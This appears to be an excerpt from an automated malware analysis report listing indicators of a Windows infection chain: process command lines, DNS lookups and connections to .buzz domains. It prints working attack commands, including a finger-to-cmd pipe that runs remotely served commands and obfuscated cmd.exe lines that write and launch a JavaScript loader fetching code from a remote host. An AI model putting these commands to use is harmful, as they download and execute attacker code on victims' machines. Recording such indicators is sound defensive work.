Technical Information
- '<SYSTEM32>\finger.exe' ok@lbawe.dfaser.buzz
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\Z0p.js"
- C:\users\public\z0p.js
- 'lb###.dfaser.buzz':79
- '5s####.vcbuyiup.buzz':80
- DNS ASK lb###.dfaser.buzz
- DNS ASK 5s####.vcbuyiup.buzz
- '<SYSTEM32>\cmd.exe' /c finger ok@lbawe.dfaser.buzz |more +2 |cmd
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "SEt RCAJ=.j&&SEt SFQFT=vLZCWarLZCW a =LZCW 'scLZCWriLZCWptLZCW:'; b =LZCW 'hLZCWTtPLZCW:'; GLZCWetLZCWObjLZCWecLZCWt(LZCWa+b+'&&sET 17N4=OMMXLOMMXL5soukc.vcbuyiup.buzzOMMXL?1OMMXL')&&sE...
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p XE3EM="%SFQFT:LZCW=%%17N4:OMMXL=/%" 0<nul 1>C:\Users\Public\Z0p%RCAJ%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start C:\Users\Public\Z0p%RCAJ%s "
- '<SYSTEM32>\cmd.exe' /c start C:\Users\Public\Z0p.js